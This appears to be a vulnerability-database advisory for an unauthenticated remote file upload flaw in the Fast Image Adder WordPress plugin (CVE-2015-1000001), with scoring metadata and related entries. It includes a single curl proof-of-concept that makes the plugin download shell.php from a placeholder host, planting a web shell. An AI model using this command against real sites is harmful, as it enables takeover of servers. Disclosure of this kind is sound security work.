Lucene search
Larry W. CashdollarWPEX-ID:0602EDE9-4F76-4D2C-9D3F-4B3B04FBAB0AHistoryJul 10, 2015 - 12:00 a.m.
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
2015-07-1000:00:00
Larry W. Cashdollar
6
0.007 Low
EPSS
Percentile
80.7%
The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability.
$ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php
Shell location is reported back to the user with random filename.Related
prion
prion
Design/Logic Flaw
2016-10-06 14:59:00
cvelist
cvelist
CVE-2015-1000001
2016-10-06 14:00:00
wpvulndb
wpvulndb
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
2015-07-10 00:00:00
cve
cve
CVE-2015-1000001
2016-10-06 14:59:01
nvd
nvd
CVE-2015-1000001
2016-10-06 14:59:01